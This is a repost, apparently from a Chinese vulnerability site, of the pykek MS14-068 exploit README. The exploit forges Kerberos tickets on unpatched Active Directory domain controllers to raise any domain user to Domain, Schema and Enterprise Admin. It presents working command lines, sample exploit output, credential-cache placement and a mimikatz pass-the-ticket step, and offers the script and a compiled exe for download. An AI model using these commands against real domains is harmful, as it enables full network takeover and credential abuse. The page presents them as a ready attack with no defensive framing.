MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

  • A+
所属分类:漏洞时代
摘要

from:https://github.com/bidord/pykekms14-068.pyExploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

from:https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

USAGE:
[php]
ms14-068.py -u @ -s -d

OPTIONS:
-p
--rc4
Example usage :

Linux (tested with samba and MIT Kerberos)

[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file '[email protected]'... Done!
[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0
[/php]

On Windows
[php]
python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc [email protected]" exit`
[/php]
提供的py脚本
MS14-068.py

附加转为exe后的程序

ms14-068.exe

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员
标签:提升为域管理员 域管理员

相关推荐

评论